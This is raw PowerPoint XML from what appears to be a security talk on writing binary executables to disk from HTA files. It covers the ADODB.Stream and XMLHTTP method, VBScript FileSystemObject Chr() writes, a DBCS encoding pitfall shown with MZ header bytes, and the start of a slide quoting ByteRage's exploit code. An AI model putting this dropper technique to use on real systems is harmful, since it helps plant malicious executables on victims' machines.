              <a:t>Ways to Create a Binary File using HTA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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ko-KR" dirty="0" smtClean="0"/>
              <a:t>The most common way </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ADODB.Stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Microsoft.XMLHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> first identified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Jelmer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Microsoft has released critical updates since KB870669</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Two other ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>equiv’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ByteRage’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> method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7BC6CF4-D333-4499-ABD9-03CD5594602F}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4096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ko-KR" dirty="0" smtClean="0"/>
              <a:t>http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4096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88916" y="1423177"/>
            <a:ext cx="9863138" cy="5543550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40965" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="417478" y="1708929"/>
            <a:ext cx="9429816" cy="3240088"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13745"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script language=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>") </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fso.CreateTextFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ForWriting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1900" b="0" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0"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altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.Close</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40966" name="Picture 7" descr="H:\bin.bmp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346568" y="3852069"/>
            <a:ext cx="6000792" cy="311620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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="그룹 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="417478" y="5066515"/>
            <a:ext cx="3286148" cy="1857388"/>
            <a:chOff x="417478" y="5066515"/>
            <a:chExt cx="2590800" cy="1195392"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1028" name="Picture 4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417478" y="5066515"/>
              <a:ext cx="2543175" cy="3714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029" name="Picture 5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417478" y="5709457"/>
              <a:ext cx="2590800" cy="5524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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="모서리가 둥근 직사각형 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="274602" y="6423837"/>
            <a:ext cx="2857520" cy="285752"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln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en-US" sz="2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굴림" pitchFamily="50" charset="-127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117344" y="3324472"/>
            <a:ext cx="2372765" cy="3847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l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(14)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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09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65" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="12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모서리가 둥근 직사각형 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="774668" y="2851937"/>
            <a:ext cx="9572692" cy="428628"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent4">
                  <a:tint val="50000"/>
                  <a:satMod val="300000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="35000">
                <a:srgbClr val="EAE2F6"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="0"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"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en-US" sz="2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굴림" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="모서리가 둥근 직사각형 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="774668" y="2066119"/>
            <a:ext cx="9572692" cy="428628"/>
          </a:xfrm>
          <a:prstGeom prst="round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rgbClr val="F0F4FA"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1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18000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effec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en-US" sz="2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굴림" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="Picture 2" descr="C:\DOCUME~1\sweetlie\LOCALS~1\Temp\VMwareDnD\00005880\error.bmp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632452" y="4495011"/>
            <a:ext cx="4676783" cy="1143008"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5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7BC6CF4-D333-4499-ABD9-03CD5594602F}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4096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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Problem in DBCS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4096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ko-KR" dirty="0" smtClean="0"/>
              <a:t>"Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>(0x99)" does not work in DBCS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>When the created binary file is executed, the error message box will be displayed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632452" y="4495011"/>
            <a:ext cx="4705350" cy="1181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" name="사각형 설명선 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="774668" y="5852333"/>
            <a:ext cx="6072230" cy="1000132"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41656"/>
              <a:gd name="adj2" fmla="val -118013"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:noFill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ko-KR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맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>The NTVDM CPU has encountered an illegal instruction.</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>CS:1c81 IP:009e </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="180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맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>OP:0f 00 00 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Choose ‘Close’ to terminate the application</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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445414" y="2156193"/>
            <a:ext cx="697338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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>... 4D 5A 44 01 05 00 FF 75 00 02 00 99 00 00 00 3E ...</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Courier New" pitchFamily="49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445414" y="2942011"/>
            <a:ext cx="697338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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>... 4D 5A 44 01 05 00 FF 75 00 02 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 3E ...</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Courier New" pitchFamily="49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03230" y="2066119"/>
            <a:ext cx="269567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0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맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Original Binary File |</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr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03230" y="2851937"/>
            <a:ext cx="266989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000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Created Binary File |</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr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0" name="아래쪽 화살표 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1417610" y="2566185"/>
            <a:ext cx="642942" cy="214314"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill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en-US" sz="2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굴림" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="모서리가 둥근 직사각형 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7989906" y="1994681"/>
            <a:ext cx="428628" cy="1357322"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln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en-US" sz="2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굴림" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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" dur="80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" dur="80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80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60"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16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5" grpId="0"/>
      <p:bldP spid="21" grpId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ko-KR" dirty="0" smtClean="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ByteRage’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> exploit code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41989" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1268445" y="2024879"/>
            <a:ext cx="8507411" cy="5041900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13745"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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 algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489048" y="2066119"/>
            <a:ext cx="8858311" cy="55399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ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;script language=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
